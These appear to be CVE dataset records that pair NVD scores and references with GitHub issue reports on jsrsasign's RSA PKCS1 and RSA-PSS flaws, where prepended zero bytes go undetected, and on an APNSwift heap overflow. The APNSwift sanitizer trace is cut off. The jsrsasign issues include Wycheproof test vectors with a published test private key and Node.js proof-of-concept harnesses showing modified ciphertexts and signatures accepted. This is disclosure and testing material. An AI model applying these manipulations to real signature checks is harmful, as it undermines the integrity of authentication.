KEY-----\nMIIEowIBAAKCAQEAs1EKK81M5kTFtZSuUFnhKy8FS2WNXaWVmi/fGHG4CLw98+Yo\n0nkuUarVwSS0O9pFPcpc3kvPKOe9Tv+6DLS3Qru21aATy2PRqjqJ4CYn71OYtSwM\n/ZfSCKvrjXybzgu+sBmobdtYm+sppbdL+GEHXGd8gdQw8DDCZSR6+dPJFAzLZTCd\nB+Ctwe/RXPF+ewVdfaOGjkZIzDoYDw7n+OHnsYCYozkbTOcWHpjVevipR+IBpGPi\n1rvKgFnlcG6d/tj0hWRl/6cS7RqhjoiNEtxqoJzpXs/Kg8xbCxXbCchkf11STA8u\ndiCjQWuWI8rcDwl69XMmHJjIQAqhKvOOQ8rYTQIDAQABAoIBABpQLQ7qbHtp4h1Y\nORAfcFRW7Q74UvtH/iEHH1TF8zyM6wZsYtcn4y0mxYE3Mp+J0xlTJbeVJkwZXYVH\nL3UH29CWHSlR+TWiazTwrCTRVJDhEoqbcTiRW8fb+o/jljVxMcVDrpyYUHNo2c6w\njBxhmKPtp66hhaDpds1Cwi0A8APZ8Z2W6kya/L/hRBzMgCz7Bon1nYBMak5PQEwV\nF0dF7Wy4vIjvCzO6DSqA415DvJDzUAUucgFudbANNXo4HJwNRnBpymYIh8mHdmNJ\n/MQ0YLSqUWvOB57dh7oWQwe3UsJ37ZUorTugvxh3NJ7Tt5ZqbCQBEECb9ND63gxo\n/a3YR/0CgYEA7BJc834xCi/0YmO5suBinWOQAF7IiRPU+3G9TdhWEkSYquupg9e6\nK9lC5k0iP+t6I69NYF7+6mvXDTmv6Z01o6oV50oXaHeAk74O3UqNCbLe9tybZ/+F\ndkYlwuGSNttMQBzjCiVy0+y0+Wm3rRnFIsAtd0RlZ24aN3bFTWJINIsCgYEAwnQq\nvNmJe9SwtnH5c/yCqPhKv1cF/4jdQZSGI6/p3KYNxlQzkHZ/6uvrU5V27ov6YbX8\nvKlKfO91oJFQxUD6lpTdgAStI3GMiJBJIZNpyZ9EWNSvwUj28H34cySpbZz3s4Xd\nhiJBShgy+fKURvBQwtWmQHZJ3EGrcOI7PcwiyYcCgYEAlql5jSUCY0ALtidzQogW\nJ+B87N+RGHsBuJ/0cxQYinwg+ySAAVbSyF1WZujfbO/5+YBN362A/1dn3lbswCnH\nK/bHF9+fZNqvwprPnceQj5oK1n4g6JSZNsy6GNAhosT+uwQ0misgR8SQE4W25dDG\nkdEYsz+BgCsyrCcu8J5C+tUCgYAFVPQbC4f2ikVyKzvgz0qx4WUDTBqRACq48p6e\n+eLatv7nskVbr7QgN+nS9+Uz80ihR0Ev1yCAvnwmM/XYAskcOea87OPmdeWZlQM8\nVXNwINrZ6LMNBLgorfuTBK1UoRo1pPUHCYdqxbEYI2unak18mikd2WB7Fp3h0YI4\nVpGZnwKBgBxkAYnZv+jGI4MyEKdsQgxvROXXYOJZkWzsKuKxVkVpYP2V4nR2YMOJ\nViJQ8FUEnPq35cMDlUk4SnoqrrHIJNOvcJSCqM+bWHAioAsfByLbUPM8sm3CDdIk\nXVJl32HuKYPJOMIWfc7hIfxLRHnCN+coz2M6tgqMDs0E/OfjuqVZ\n-----END RSA PRIVATE KEY-----", "privateKeyPkcs8" : "308204bd020100300d06092a864886f70d0101010500048204a7308204a30201000282010100b3510a2bcd4ce644c5b594ae5059e12b2f054b658d5da5959a2fdf1871b808bc3df3e628d2792e51aad5c124b43bda453dca5cde4bcf28e7bd4effba0cb4b742bbb6d5a013cb63d1aa3a89e02627ef5398b52c0cfd97d208abeb8d7c9bce0bbeb019a86ddb589beb29a5b74bf861075c677c81d430f030c265247af9d3c9140ccb65309d07e0adc1efd15cf17e7b055d7da3868e4648cc3a180f0ee7f8e1e7b18098a3391b4ce7161e98d57af8a947e201a463e2d6bbca8059e5706e9dfed8f4856465ffa712ed1aa18e888d12dc6aa09ce95ecfca83cc5b0b15db09c8647f5d524c0f2e7620a3416b9623cadc0f097af573261c98c8400aa12af38e43cad84d0203010001028201001a502d0eea6c7b69e21d5839101f705456ed0ef852fb47fe21071f54c5f33c8ceb066c62d727e32d26c58137329f89d3195325b795264c195d85472f7507dbd0961d2951f935a26b34f0ac24d15490e1128a9b7138915bc7dbfa8fe396357131c543ae9c98507368d9ceb08c1c6198a3eda7aea185a0e976cd42c22d00f003d9f19d96ea4c9afcbfe1441ccc802cfb0689f59d804c6a4e4f404c15174745ed6cb8bc88ef0b33ba0d2a80e35e43bc90f350052e72016e75b00d357a381c9c0d467069ca660887c987766349fcc43460b4aa516bce079edd87ba164307b752c277ed9528ad3ba0bf1877349ed3b7966a6c240110409bf4d0fade0c68fdadd847fd02818100ec125cf37e310a2ff46263b9b2e0629d6390005ec88913d4fb71bd4dd856124498aaeba983d7ba2bd942e64d223feb7a23af4d605efeea6bd70d39afe99d35a3aa15e74a1768778093be0edd4a8d09b2def6dc9b67ff85764625c2e19236db4c401ce30a2572d3ecb4f969b7ad19c522c02d774465676e1a3776c54d6248348b02818100c2742abcd9897bd4b0b671f973fc82a8f84abf5705ff88dd41948623afe9dca60dc6543390767feaebeb539576ee8bfa61b5fcbca94a7cef75a09150c540fa9694dd8004ad23718c889049219369c99f4458d4afc148f6f07df87324a96d9cf7b385dd8622414a1832f9f29446f050c2d5a6407649dc41ab70e23b3dcc22c9870281810096a9798d250263400bb6277342881627e07cecdf91187b01b89ff47314188a7c20fb24800156d2c85d5666e8df6ceff9f9804ddfad80ff5767de56ecc029c72bf6c717df9f64daafc29acf9dc7908f9a0ad67e20e8949936ccba18d021a2c4febb04349a2b2047c4901385b6e5d0c691d118b33f81802b32ac272ef09e42fad50281800554f41b0b87f68a45722b3be0cf4ab1e165034c1a91002ab8f29e9ef9e2dab6fee7b2455bafb42037e9d2f7e533f348a147412fd72080be7c2633f5d802c91c39e6bcece3e675e59995033c55737020dad9e8b30d04b828adfb9304ad54a11a35a4f50709876ac5b118236ba76a4d7c9a291dd9607b169de1d182385691999f0281801c640189d9bfe8c623833210a76c420c6f44e5d760e259916cec2ae2b156456960fd95e2747660c389562250f055049cfab7e5c3039549384a7a2aaeb1c824d3af709482a8cf9b587022a00b1f0722db50f33cb26dc20dd2245d5265df61ee2983c938c2167dcee121fc4b4479c237e728cf633ab60a8c0ecd04fce7e3baa559", "type" : "RsaesPkcs1Decrypt", "tests" : [ { "tcId" : 31, "comment" : "prepended bytes to ciphertext", "msg" : "54657374", "ct" : "00004501b4d669e01b9ef2dc800aa1b06d49196f5a09fe8fbcd037323c60eaf027bfb98432be4e4a26c567ffec718bcbea977dd26812fa071c33808b4d5ebb742d9879806094b6fbeea63d25ea3141733b60e31c6912106e1b758a7fe0014f075193faa8b4622bfd5d3013f0a32190a95de61a3604711bc62945f95a6522bd4dfed0a994ef185b28c281f7b5e4c8ed41176d12d9fc1b837e6a0111d0132d08a6d6f0580de0c9eed8ed105531799482d1e466c68c23b0c222af7fc12ac279bc4ff57e7b4586d209371b38c4c1035edd418dc5f960441cb21ea2bedbfea86de0d7861e81021b650a1de51002c315f1e7c12debe4dcebf790caaa54a2f26b149cf9e77d", "result" : "invalid", "flags" : [] }, { "tcId" : 31, "comment" : "correct ciphertext", "msg" : "54657374", "ct" : "4501b4d669e01b9ef2dc800aa1b06d49196f5a09fe8fbcd037323c60eaf027bfb98432be4e4a26c567ffec718bcbea977dd26812fa071c33808b4d5ebb742d9879806094b6fbeea63d25ea3141733b60e31c6912106e1b758a7fe0014f075193faa8b4622bfd5d3013f0a32190a95de61a3604711bc62945f95a6522bd4dfed0a994ef185b28c281f7b5e4c8ed41176d12d9fc1b837e6a0111d0132d08a6d6f0580de0c9eed8ed105531799482d1e466c68c23b0c222af7fc12ac279bc4ff57e7b4586d209371b38c4c1035edd418dc5f960441cb21ea2bedbfea86de0d7861e81021b650a1de51002c315f1e7c12debe4dcebf790caaa54a2f26b149cf9e77d", "result" : "valid", "flags" : [] } ] } ] } ``` and proof of concept: ``` var rs = require('jsrsasign'); var obj = require("./rsa_pkcs1.json"); for (let testGroup of obj.testGroups) { var keyPem = testGroup.privateKeyPem; var prv = new rs.RSAKey(); prv.readPrivateKeyFromPEMString(keyPem); for(let test of testGroup.tests) { console.log("[*] Test " + test.tcId + " result: " + test.result) try { var pt = rs.crypto.Cipher.decrypt(test.ct, prv); var result = Buffer.from(pt).toString('hex') === test.msg; if (result == true) { if (test.result == "valid" || test.result == "acceptable") console.log("Result: PASS"); else console.log("Result: FAIL") } if (result == false) { if (test.result == "valid" || test.result == "acceptable") console.log("Result: FAIL"); else console.log("Result: PASS") } } catch (e) { console.log("ERROR - VERIFY: " + e) if (test.result == "valid" || test.result == "acceptable") console.log("Result: FAIL"); else console.log("Result: PASS") } } } ``` with result: ``` [*] Test 31 result: invalid Result: FAIL [*] Test 31 result: valid Result: PASS ``` Best regards, Antonio
The RSA PKCS1 v1.5 decryption implementation does not detect ciphertext modification (prepended 0's bytes to the ciphertext)
https://api.github.com/repos/kjur/jsrsasign/issues/439/comments
3
2020-06-06T18:19:15Z
2020-08-18T10:34:28Z
https://github.com/kjur/jsrsasign/issues/439
632,645,335
439
1,304
CVE-2020-14968
2020-06-22T12:15:10.227
An issue was discovered in the jsrsasign package before 8.0.17 for Node.js. Its RSASSA-PSS (RSA-PSS) implementation does not detect signature manipulation/modification by prepending '\0' bytes to a signature (it accepts these modified signatures as valid). An attacker can abuse this behavior in an application by creating multiple valid signatures where only one signature should exist. Also, an attacker might prepend these bytes with the goal of triggering memory corruption issues.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/issues/438" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/releases/tag/8.0.17" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/releases/tag/8.0.18" }, { "source": "cve@mitre.org", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://kjur.github.io/jsrsasign/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200724-0001/" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://www.npmjs.com/package/jsrsasign" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/issues/438" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/releases/tag/8.0.17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/kjur/jsrsasign/releases/tag/8.0.18" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://kjur.github.io/jsrsasign/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200724-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://www.npmjs.com/package/jsrsasign" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jsrsasign_project:jsrsasign:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "2C7116EE-0321-40CF-94E7-EF494E9DF12C", "versionEndExcluding": "8.0.17", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:*", "matchCriteriaId": "FD1FCB0D-3E19-4461-9330-4D7F02972A35", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/kjur/jsrsasign/issues/438
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kjur", "jsrsasign" ]
The jsrsasign 8.0.16 RSASSA-PSS (RSA-PSS) implementation does not detect prepending 0s to the signature and accepts modifies signatures with prepended 0's as valid. You can verify this using the following test vectors from Google Wycheproof: ``` { "algorithm" : "RSASSA-PSS", "generatorVersion" : "0.8r12", "numberOfTests" : 103, "header" : [ "Test vectors of class RsassaPssVerify are intended for checking the", "verification of RSASSA-PSS signatures." ], "notes" : { }, "schema" : "rsassa_pss_verify_schema.json", "testGroups" : [ { "e" : "010001", "keyAsn" : "3082010a0282010100a2b451a07d0aa5f96e455671513550514a8a5b462ebef717094fa1fee82224e637f9746d3f7cafd31878d80325b6ef5a1700f65903b469429e89d6eac8845097b5ab393189db92512ed8a7711a1253facd20f79c15e8247f3d3e42e46e48c98e254a2fe9765313a03eff8f17e1a029397a1fa26a8dce26f490ed81299615d9814c22da610428e09c7d9658594266f5c021d0fceca08d945a12be82de4d1ece6b4c03145b5d3495d4ed5411eb878daf05fd7afc3e09ada0f1126422f590975a1969816f48698bcbba1b4d9cae79d460d8f9f85e7975005d9bc22c4e5ac0f7c1a45d12569a62807d3b9a02e5a530e773066f453d1f5b4c2e9cf7820283f742b9d50203010001", "keyDer" : "30820122300d06092a864886f70d01010105000382010f003082010a0282010100a2b451a07d0aa5f96e455671513550514a8a5b462ebef717094fa1fee82224e637f9746d3f7cafd31878d80325b6ef5a1700f65903b469429e89d6eac8845097b5ab393189db92512ed8a7711a1253facd20f79c15e8247f3d3e42e46e48c98e254a2fe9765313a03eff8f17e1a029397a1fa26a8dce26f490ed81299615d9814c22da610428e09c7d9658594266f5c021d0fceca08d945a12be82de4d1ece6b4c03145b5d3495d4ed5411eb878daf05fd7afc3e09ada0f1126422f590975a1969816f48698bcbba1b4d9cae79d460d8f9f85e7975005d9bc22c4e5ac0f7c1a45d12569a62807d3b9a02e5a530e773066f453d1f5b4c2e9cf7820283f742b9d50203010001", "keyPem" : "-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAorRRoH0KpfluRVZxUTVQ\nUUqKW0YuvvcXCU+h/ugiJOY3+XRtP3yv0xh42AMltu9aFwD2WQO0aUKeidbqyIRQ\nl7WrOTGJ25JRLtincRoSU/rNIPecFegkfz0+QuRuSMmOJUov6XZTE6A+/48X4aAp\nOXofomqNzib0kO2BKZYV2YFMItphBCjgnH2WWFlCZvXAIdD87KCNlFoSvoLeTR7O\na0wDFFtdNJXU7VQR64eNrwX9evw+Ca2g8RJkIvWQl1oZaYFvSGmLy7obTZyuedRg\n2Pn4Xnl1AF2bwixOWsD3waRdElaaYoB9O5oC5aUw53MGb0U9H1tMLpz3ggKD90K5\n1QIDAQAB\n-----END PUBLIC KEY-----", "keysize" : 2048, "mgf" : "MGF1", "mgfSha" : "SHA-256", "n" : "00a2b451a07d0aa5f96e455671513550514a8a5b462ebef717094fa1fee82224e637f9746d3f7cafd31878d80325b6ef5a1700f65903b469429e89d6eac8845097b5ab393189db92512ed8a7711a1253facd20f79c15e8247f3d3e42e46e48c98e254a2fe9765313a03eff8f17e1a029397a1fa26a8dce26f490ed81299615d9814c22da610428e09c7d9658594266f5c021d0fceca08d945a12be82de4d1ece6b4c03145b5d3495d4ed5411eb878daf05fd7afc3e09ada0f1126422f590975a1969816f48698bcbba1b4d9cae79d460d8f9f85e7975005d9bc22c4e5ac0f7c1a45d12569a62807d3b9a02e5a530e773066f453d1f5b4c2e9cf7820283f742b9d5", "sLen" : 32, "sha" : "SHA-256", "type" : "RsassaPssVerify", "tests" : [ { "tcId" : 99, "comment" : "prepending 0's to signature", "msg" : "313233343030", "sig" : "000068caf07e71ee654ffabf07d342fc4059deb4f7e5970746c423b1e8f668d5332275cc35eb61270aebd27855b1e80d59def47fe8882867fd33c2308c91976baa0b1df952caa78db4828ab81e79949bf145cbdfd1c4987ed036f81e8442081016f20fa4b587574884ca6f6045959ce3501ae7c02b1902ec1d241ef28dee356c0d30d28a950f1fbc683ee7d9aad26b048c13426fe3975d5638afeb5b9c1a99d162d3a5810e8b074d7a2eae2be52b577151f76e1f734b0a956ef4f22be64dc20a81ad1316e4f79dff5fc41fc08a20bc612283a88415d41595bfea66d59de7ac12e230f72244ad9905aef0ead3fa41ed70bf4218863d5f041292f2d14ce0a7271c6d36", "result" : "invalid", "flags" : [] }, { "tcId" : 100, "comment" : "correct signature", "msg" : "313233343030", "sig" : "68caf07e71ee654ffabf07d342fc4059deb4f7e5970746c423b1e8f668d5332275cc35eb61270aebd27855b1e80d59def47fe8882867fd33c2308c91976baa0b1df952caa78db4828ab81e79949bf145cbdfd1c4987ed036f81e8442081016f20fa4b587574884ca6f6045959ce3501ae7c02b1902ec1d241ef28dee356c0d30d28a950f1fbc683ee7d9aad26b048c13426fe3975d5638afeb5b9c1a99d162d3a5810e8b074d7a2eae2be52b577151f76e1f734b0a956ef4f22be64dc20a81ad1316e4f79dff5fc41fc08a20bc612283a88415d41595bfea66d59de7ac12e230f72244ad9905aef0ead3fa41ed70bf4218863d5f041292f2d14ce0a7271c6d36", "result" : "valid", "flags" : [] }, { "tcId" : 101, "comment" : "appending 0's to signature", "msg" : "313233343030", "sig" : "68caf07e71ee654ffabf07d342fc4059deb4f7e5970746c423b1e8f668d5332275cc35eb61270aebd27855b1e80d59def47fe8882867fd33c2308c91976baa0b1df952caa78db4828ab81e79949bf145cbdfd1c4987ed036f81e8442081016f20fa4b587574884ca6f6045959ce3501ae7c02b1902ec1d241ef28dee356c0d30d28a950f1fbc683ee7d9aad26b048c13426fe3975d5638afeb5b9c1a99d162d3a5810e8b074d7a2eae2be52b577151f76e1f734b0a956ef4f22be64dc20a81ad1316e4f79dff5fc41fc08a20bc612283a88415d41595bfea66d59de7ac12e230f72244ad9905aef0ead3fa41ed70bf4218863d5f041292f2d14ce0a7271c6d360000", "result" : "invalid", "flags" : [] } ] } ] } ``` in the following proof of concept: ``` var rs = require('jsrsasign'); var obj = require("./rsa_pss.json"); for (let testGroup of obj.testGroups) { var keyPem = testGroup.keyPem; for(let test of testGroup.tests) { console.log("[*] Test " + test.tcId + " result: " + test.result) try { var sig = new rs.Signature({alg: 'SHA256withRSAandMGF1'}); sig.init(keyPem); sig.updateHex(test.msg); var result = sig.verify(test.sig); if (result == true) { if (test.result == "valid" || test.result == "acceptable") console.log("Result: PASS"); else console.log("Result: FAIL") } if (result == false) { if (test.result == "valid" || test.result == "acceptable") console.log("Result: FAIL"); else console.log("Result: PASS") } } catch (e) { console.log("ERROR - VERIFY: " + e) if (test.result == "valid" || test.result == "acceptable") console.log("Result: FAIL"); else console.log("Result: PASS") } } } ``` with result: ``` [*] Test 99 result: invalid Result: FAIL [*] Test 100 result: valid Result: PASS [*] Test 101 result: invalid Result: PASS ``` Best regards, Antonio
The RSA-PSS implementation does not detect signature modification (prepending "0" bytes) to the signature
https://api.github.com/repos/kjur/jsrsasign/issues/438/comments
3
2020-06-06T18:15:25Z
2020-08-18T10:36:20Z
https://github.com/kjur/jsrsasign/issues/438
632,642,479
438
1,305
CVE-2020-4068
2020-06-22T16:15:11.870
In APNSwift 1.0.0, calling APNSwiftSigner.sign(digest:) is likely to result in a heap buffer overflow. This has been fixed in 1.0.1.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/kylebrowning/APNSwift/commit/97fa7f69dcdd89168fff84e0ba8f999881ee3d3f" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/kylebrowning/APNSwift/issues/31" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/kylebrowning/APNSwift/pull/32" }, { "source": "security-advisories@github.com", "tags": [ "Vendor Advisory" ], "url": "https://github.com/kylebrowning/APNSwift/security/advisories/GHSA-qh2w-vjxg-mjcg" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/kylebrowning/APNSwift/commit/97fa7f69dcdd89168fff84e0ba8f999881ee3d3f" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/kylebrowning/APNSwift/issues/31" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://github.com/kylebrowning/APNSwift/pull/32" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://github.com/kylebrowning/APNSwift/security/advisories/GHSA-qh2w-vjxg-mjcg" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:apnswift_project:apnswift:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "15C15C89-986E-4A2C-AB33-92A3C5417759", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "122" ]
122
https://github.com/kylebrowning/APNSwift/issues/31
[ "Issue Tracking" ]
github.com
[ "kylebrowning", "APNSwift" ]
**Describe the bug** This looks like quite a serious bug, the test suite is failing address sanitizer: ``` Test Suite 'All tests' started at 2019-07-22 11:43:35.772 am Test Suite 'apnswiftPackageTests.xctest' started at 2019-07-22 11:43:35.773 am Test Suite 'APNSwiftConfigurationTests' started at 2019-07-22 11:43:35.773 am Test Case '-[APNSwiftTests.APNSwiftConfigurationTests testProductionConfiguration]' started. Test Case '-[APNSwiftTests.APNSwiftConfigurationTests testProductionConfiguration]' passed (0.135 seconds). Test Case '-[APNSwiftTests.APNSwiftConfigurationTests testSandboxConfiguration]' started. Test Case '-[APNSwiftTests.APNSwiftConfigurationTests testSandboxConfiguration]' passed (0.001 seconds). Test Case '-[APNSwiftTests.APNSwiftConfigurationTests testSignature]' started. ================================================================= ==41340==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x615000013880 at pc 0x0001053595ee bp 0x7ffeea8c8660 sp 0x7ffeea8c7e08 READ of size 513 at 0x615000013880 thread T0 #0 0x1053595ed in wrap_strlen (libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x175ed) #1 0x10a9d6ed8 in mem_puts (libcrypto.1.0.0.dylib:x86_64+0xa8ed8) #2 0x10a9d638a in BIO_puts (libcrypto.1.0.0.dylib:x86_64+0xa838a) #3 0x10d402450 in closure #1 in APNSwiftSigner.sign(digest:) APNSwiftSigner.swift:39 #4 0x10d4025f2 in thunk for @callee_guaranteed (@unowned UnsafeRawBufferPointer) -> (@unowned Int, @error @owned Error) <compiler-generated> #5 0x10d402693 in partial apply for thunk for @callee_guaranteed (@unowned UnsafeRawBufferPointer) -> (@unowned Int, @error @owned Error) <compiler-generated> #6 0x10d98c8af in ByteBuffer.withUnsafeReadableBytes<A>(_:) ByteBuffer-core.swift:530 #7 0x10d3ffc3b in APNSwiftSigner.sign(digest:) APNSwiftSigner.swift:38 #8 0x10d41abe3 in APNSwiftConfigurationTests.testSignature() APNSwiftConfigurationTests.swift:57 #9 0x10d41b53d in @objc APNSwiftConfigurationTests.testSignature() <compiler-generated> #10 0x7fff2f2225eb in __invoking___ (CoreFoundation:x86_64h+0x4a5eb) #11 0x7fff2f2224a3 in -[NSInvocation invoke] (CoreFoundation:x86_64h+0x4a4a3) #12 0x1060f4c6d in __24-[XCTestCase invokeTest]_block_invoke_2.214 (XCTest:x86_64+0x2dc6d) #13 0x10618113a in -[XCTMemoryChecker _assertInvalidObjectsDeallocatedAfterScope:] (XCTest:x86_64+0xba13a) #14 0x1060ff8da in -[XCTestCase assertInvalidObjectsDeallocatedAfterScope:] (XCTest:x86_64+0x388da) #15 0x1060f4bfd in __24-[XCTestCase invokeTest]_block_invoke.208 (XCTest:x86_64+0x2dbfd) #16 0x10616858f in -[XCTestCase(Failures) performFailableBlock:testCaseRun:shouldInterruptTest:] (XCTest:x86_64+0xa158f) #17 0x1061684ac in -[XCTestCase(Failures) _performTurningExceptionsIntoFailuresInterruptAfterHandling:block:] (XCTest:x86_64+0xa14ac) #18 0x1060f46ae in __24-[XCTestCase invokeTest]_block_invoke (XCTest:x86_64+0x2d6ae) #19 0x1060f41a7 in -[XCTestCase testContextPerformInScope:] (XCTest:x86_64+0x2d1a7) #20 0x1060f4241 in -[XCTestCase invokeTest] (XCTest:x86_64+0x2d241) #21 0x1060f6020 in __26-[XCTestCase performTest:]_block_invoke_2 (XCTest:x86_64+0x2f020) #22 0x10616858f in -[XCTestCase(Failures) performFailableBlock:testCaseRun:shouldInterruptTest:] (XCTest:x86_64+0xa158f) #23 0x1061684ac in -[XCTestCase(Failures) _performTurningExceptionsIntoFailuresInterruptAfterHandling:block:] (XCTest:x86_64+0xa14ac) #24 0x1060f5f37 in __26-[XCTestCase performTest:]_block_invoke.342 (XCTest:x86_64+0x2ef37) #25 0x10617880b in +[XCTContext runInContextForTestCase:block:] (XCTest:x86_64+0xb180b) #26 0x1060f56aa in -[XCTestCase performTest:] (XCTest:x86_64+0x2e6aa) #27 0x106147163 in -[XCTest runTest] (XCTest:x86_64+0x80163) #28 0x1060efd4a in __27-[XCTestSuite performTest:]_block_invoke (XCTest:x86_64+0x28d4a) #29 0x1060ef474 in -[XCTestSuite _performProtectedSectionForTest:testSection:] (XCTest:x86_64+0x28474) #30 0x1060ef771 in -[XCTestSuite performTest:] (XCTest:x86_64+0x28771) #31 0x106147163 in -[XCTest runTest] (XCTest:x86_64+0x80163) #32 0x1060efd4a in __27-[XCTestSuite performTest:]_block_invoke (XCTest:x86_64+0x28d4a) #33 0x1060ef474 in -[XCTestSuite _performProtectedSectionForTest:testSection:] (XCTest:x86_64+0x28474) #34 0x1060ef771 in -[XCTestSuite performTest:] (XCTest:x86_64+0x28771) #35 0x106147163 in -[XCTest runTest] (XCTest:x86_64+0x80163) #36 0x1060efd4a in __27-[XCTestSuite performTest:]_block_invoke (XCTest:x86_64+0x28d4a) #37 0x1060ef474 in -[XCTestSuite _performProtectedSectionForTest:testSection:] (XCTest:x86_64+0x28474) #38 0x1060ef771 in -[XCTestSuite performTest:] (XCTest:x86_64+0x28771) #39 0x106147163 in -[XCTest runTest] (XCTest:x86_64+0x80163) #40 0x106192ab5 in __44-[XCTTestRunSession runTestsAndReturnError:]_block_invoke (XCTest:x86_64+0xcbab5) #41 0x106192bb1 in __44-[XCTTestRunSession runTestsAndReturnError:]_block_invoke.84 (XCTest:x86_64+0xcbbb1) #42 0x1061162e8 in -[XCTestObservationCenter _observeTestExecutionForBlock:] (XCTest:x86_64+0x4f2e8) #43 0x106192873 in -[XCTTestRunSession runTestsAndReturnError:] (XCTest:x86_64+0xcb873) #44 0x1060d2a9f in -[XCTestDriver runTestsAndReturnError:] (XCTest:x86_64+0xba9f) #45 0x106174b53 in _XCTestMain 